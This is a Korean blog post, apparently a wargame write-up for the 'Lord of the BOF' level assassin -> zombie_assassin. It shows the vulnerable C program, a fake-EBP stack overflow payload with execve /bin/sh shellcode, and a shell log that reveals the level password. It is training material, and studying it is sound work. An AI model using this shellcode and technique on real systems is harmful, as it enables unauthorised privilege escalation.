ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] assassin -> zombie_assassin
    공부/LOB 2014. 7. 30. 20:07

    [assassin@localhost assassin]$ cat zombie_assassin.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - zombie_assassin
            - FEBP
    */

    #include <stdio.h>
    #include <stdlib.h>

    main(int argc, char *argv[])
    {
        char buffer[40];

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
            printf("stack retbayed you!\n");
            exit(0);
        }

            if(argv[1][47] == '\x40')
            {
                    printf("library retbayed you, too!!\n");
                    exit(0);
            }

        // strncpy instead of strcpy!
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
    }

    0x80484df <main+159>:    leave 
    0x80484e0 <main+160>:    ret

    0xbffffc52:    0x90909090
    (gdb)
    0xbffffb08

    25byte
    shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


    payload = [sc] + 쉘코드 23 바이트 + nop 13bytes + [sc-8] + leaveret

    ./aaaaaaaaaaaaaaa `python -c'print "a"*40+"\xa0\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

    `python -c 'print "bbbb"+"\x9f\xfa\xff\xbf"+"\x90"*7 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" +"\x90\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
       
    [assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "bbbb"+"\x9f\xfa\xff\xbf"+"\x90"*7 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" +"\x90\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
    bbbb??퓧??????1픐h//shh/bin??S??째
                                         ???욀?
    bash$ id
    uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
    bash$ my-pass
    euid = 516
    no place to hide
    bash$

    '공부 > LOB' 카테고리의 다른 글

    [lob] succubus -> nightmare  (0) 2015.02.19
    [lob] zombie_assassin -> succubus  (0) 2015.02.17
    [lob] assassin -> zombie_assassin  (0) 2014.07.30
    [lob] giant -> assassin  (0) 2014.07.30
    [lob] bugbear -> giant  (0) 2014.07.30
    [lob] darkknight -> bugbrear  (0) 2014.07.30

    댓글 0

Designed by Tistory.